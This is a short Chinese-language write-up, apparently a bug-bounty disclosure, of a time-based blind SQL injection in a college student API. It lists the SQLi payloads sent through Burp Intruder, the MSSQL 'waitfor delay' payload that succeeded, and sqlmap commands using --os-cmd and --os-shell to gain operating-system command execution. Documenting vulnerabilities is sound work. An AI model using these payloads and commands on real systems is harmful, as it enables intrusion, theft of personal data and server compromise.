无意中发现一些数据是通过 API 获取的:(其实这种数据也很常见,就是其页面是一个XML文件)

所以这里启动了 Burp，并在battering模式下通过intruder发送了以下SQL盲注有效负载。

' or sleep(5)#--
' or sleep(5)='
;waitfor delay '0:0:5'--
') or sleep(5)='

结果：

;waitfor delay '0:0:5'--

这一条语句被执行。

数据库延迟了5秒钟返回了数据包。

请注意查看图片右下角的时间。（5193ms）

下面是延迟10秒

右下角时间戳（10114ms）

后面使用sqlmap这个工具，利用该工具，能看到所有的数据库。

数据库相当大，包含：用户名、密码、备份、地址、电话号码、电子邮件……

远程代码执行(RCE)

获取shell的方式很简单，这里使用sqlmap获取shell。

sqlmap -u "https://xxx.com/api/v1/StudentSomething?parameter1=9999" -H "Cookie: uni-cookie=MY-COOKIE-HERE"  --random-agent --os-cmd whoami

sqlmap响应

返回了MSSQL的路径，且返回了我是DBA用户。（DBA：数据库管理员）

之后，进行shell尝试。

sqlmap -u "https://snoopy-college.tld/api/v1/StudentSomething?parameter1=9999" -H "Cookie: uni-cookie=MY-COOKIE-HERE"  --random-agent --os-shell

如上所示，返回了shell。

黑帽黑客可能会滥用此功能来：

• 破坏网站
• 关闭服务器/网站
• 提取服务器上的所有文件（使用FTP服务器或其他）
• 删除所有文件和目录